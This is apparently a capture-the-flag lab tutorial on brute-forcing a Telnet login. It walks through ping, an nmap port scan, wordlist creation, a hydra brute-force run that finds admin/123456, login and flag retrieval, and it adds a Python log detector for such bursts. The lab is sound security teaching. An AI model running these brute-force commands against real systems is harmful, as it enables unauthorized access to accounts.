Telnet Brute Force and Weak Credentials


Introduction

Welcome to this hands-on lab focused on password security and brute-force attacks. Many security breaches occur not because of complex software exploits, but due to simple, weak, or default credentials. A brute-force attack is an automated method of trying numerous username and password combinations until the correct one is found.

In this lab, you will simulate an attack on a system with a vulnerable Telnet service protected by a weak password. You will use standard penetration testing tools to perform reconnaissance, prepare for the attack, and execute it. You will start by verifying connectivity, scanning the target with nmap, and then using hydra, a popular password-cracking tool, to discover the login credentials. Finally, you'll use the discovered credentials to access the system and capture a flag.

Upon completion, you will understand how to:

  • Verify network connectivity using ping.
  • Use nmap to confirm a specific service is running.
  • Create wordlists for a brute-force attack.
  • Use hydra to perform a brute-force attack against a Telnet service.
  • Gain access to a system using compromised credentials.

Let's get started.

Verify Connectivity to Target with Ping

In this step, you will start by confirming that your attack machine can communicate with the target system. The ping command is a basic network diagnostic tool that sends a request to a target host and listens for a reply, confirming its reachability.

Your environment includes a target system accessible with the hostname target. To ensure it's online and responsive, run the following command in your terminal. The -c 4 flag tells ping to send exactly four packets.

ping -c 4 target

You should see a response similar to the one below. This confirms that the target is online and your network connection is stable. The IP address and response times may differ slightly.

PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.064 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.063 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.064 ms

--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3069ms
rtt min/avg/max/mdev = 0.063/0.069/0.086/0.010 ms

With connectivity confirmed, you are ready to proceed with scanning the target.

Scan Open Ports with Nmap

In this step, you will use nmap to scan the target for open ports and running services. This is a critical part of reconnaissance, as it helps identify potential points of entry. We suspect a Telnet service is running, which typically uses port 23.

To confirm this, run a targeted nmap scan. The -p 23 flag focuses the scan specifically on the Telnet port.

Execute the following command in your terminal:

nmap -p 23 target

The output will show the status of the specified port. You should see a result similar to this:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-19 14:10 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00040s latency).

PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

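The output confirms that port 23/tcp is open. Without version detection, nmap takes the service name telnet from its port-to-service table rather than by probing the listener, which is sufficient for this lab. This is the service we will target in the next step.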

Connect to Target via Telnet with Brute Force

In this step, you will perform a brute-force attack against the Telnet service using hydra. Since we don't know the password, we will provide hydra with lists of potential usernames and passwords to try automatically.

First, create two simple wordlists: one for usernames (users.txt) and one for passwords (pass.txt). We will include common and likely candidates.

Create the username list:

echo -e "admin\nuser\nroot" > users.txt

Create the password list:

echo -e "password\nadmin\n123456" > pass.txt

Now, use hydra to launch the attack. The -L flag specifies the user list, -P specifies the password list, and telnet://target defines the protocol and host to attack.

hydra -L users.txt -P pass.txt telnet://target

hydra will now attempt to log in with every combination of username and password from your lists. After a few moments, it will find the correct credentials and display them.

Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-19 14:11:54
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking telnet://target:23/
[23][telnet] host: target   login: admin   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-19 14:11:57

The output clearly shows that a valid login was found: username admin with password 123456.
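
Seen from the target, a run like this is a burst of failed logins from one address that ends in a success. The following Python detector is an added example, not part of the original lab: the log lines are constructed, their layout (modelled on login(1) syslog messages) is an assumption, and detect_bruteforce, its thresholds and the address 172.17.0.9 are hypothetical.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines modelled on login(1) syslog messages; the exact
# layout is an assumption, so adapt the regex to the target's auth log.
SAMPLE_LOG = """\
Sep 19 06:03:10 target login[390]: FAILED LOGIN 1 FROM 172.17.0.9 FOR admin, Authentication failure
Sep 19 06:03:21 target login[390]: LOGIN ON pts/0 BY admin FROM 172.17.0.9
Sep 19 06:11:55 target login[411]: FAILED LOGIN 1 FROM 172.17.0.1 FOR admin, Authentication failure
Sep 19 06:11:55 target login[412]: FAILED LOGIN 1 FROM 172.17.0.1 FOR user, Authentication failure
Sep 19 06:11:55 target login[413]: FAILED LOGIN 1 FROM 172.17.0.1 FOR root, Authentication failure
Sep 19 06:11:56 target login[414]: FAILED LOGIN 1 FROM 172.17.0.1 FOR admin, Authentication failure
Sep 19 06:11:56 target login[415]: FAILED LOGIN 1 FROM 172.17.0.1 FOR root, Authentication failure
Sep 19 06:11:57 target login[416]: LOGIN ON pts/1 BY admin FROM 172.17.0.1
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: "
    r"(?:FAILED LOGIN \d+ FROM (?P<fsrc>\S+) FOR (?P<fuser>[^,]+),"
    r"|LOGIN ON \S+ BY (?P<suser>\S+) FROM (?P<ssrc>\S+))"
)

def detect_bruteforce(log_text, threshold=5, window_s=60, year=2025):
    """Flag sources with >= threshold failures inside window_s seconds and
    record a successful login from that source while the burst is recent."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)   # source -> (time, user) of recent failures
    alerts = {}                   # source -> alert record
    for line in log_text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue              # ignore unrelated syslog lines
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src = m["fsrc"] or m["ssrc"]
        q = recent[src]
        while q and when - q[0][0] > window:
            q.popleft()           # expire failures that left the window
        if m["fsrc"]:
            q.append((when, m["fuser"]))
            if len(q) >= threshold:
                rec = alerts.setdefault(
                    src, {"users": set(), "failures": 0, "compromised": None})
                rec["users"].update(u for _, u in q)
                rec["failures"] = max(rec["failures"], len(q))
        elif src in alerts and q:
            alerts[src]["compromised"] = m["suser"]  # success after a burst
    return alerts
```

A single mistyped password followed by a normal login, like the one from 172.17.0.9 in the sample, stays below the threshold and is not reported.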

Explore Target System and Locate Flag

In this step, you will use the credentials discovered by hydra to log into the target system and find the flag. This is the final phase of the attack, where you achieve your objective.

Connect to the target using the telnet client:

telnet target

The system will prompt you for a login. Enter the username admin and press Enter. Then, when prompted for the password, enter 123456 and press Enter.

Trying 172.17.0.2...
Connected to target.
Escape character is '^]'.

Linux 5.15.0-56-generic (target) (pts/0)

target login: admin
Password:

Upon successful login, you will be presented with a shell prompt. You are now inside the target system.

Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-56-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Fri Sep 19 06:11:55 UTC 2025 from 172.17.0.1 on pts/0
admin@target:~$

Now, list the contents of the current directory (/home/admin) to find the flag.

ls -la

You will see the flag.txt file in the listing.

admin@target:~$ ls -la
total 28
drwxr-xr-x 3 admin admin 4096 Sep 19 06:11 .
drwxr-xr-x 1 root  root  4096 Sep 19 06:08 ..
-rw-r--r-- 1 admin admin  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 admin admin 3771 Feb 25  2020 .bashrc
drwx------ 2 admin admin 4096 Sep 19 06:11 .cache
-rw-r--r-- 1 admin admin  807 Feb 25  2020 .profile
-rw-r--r-- 1 admin admin   33 Sep 19 06:08 flag.txt

Finally, use the cat command to read the contents of flag.txt.

cat flag.txt

The terminal will display the flag.

admin@target:~$ cat flag.txt
labex{w34k_p4ssw0rd_brut3f0rc3d}

Congratulations! You have successfully brute-forced the Telnet service and captured the flag. Copy the flag value to complete the lab. To exit the session, type logout and press Enter.

Summary

In this lab, you successfully executed a brute-force attack against a Telnet service. You learned a systematic approach to compromising a system with weak credentials.

You practiced how to:

  • Confirm network reachability with ping.
  • Use nmap to verify that a specific service is active on a target port.
  • Create simple but effective username and password wordlists.
  • Employ hydra to automate the process of trying login combinations and identify valid credentials.
  • Use the compromised credentials to log in, explore the target system, and retrieve a flag.

This exercise demonstrates a fundamental security risk: the use of weak, guessable passwords. It also highlights the danger of using unencrypted protocols like Telnet, which expose credentials to network sniffing. The skills you've learned are essential both for ethical hackers who test system defenses and for system administrators who must secure them.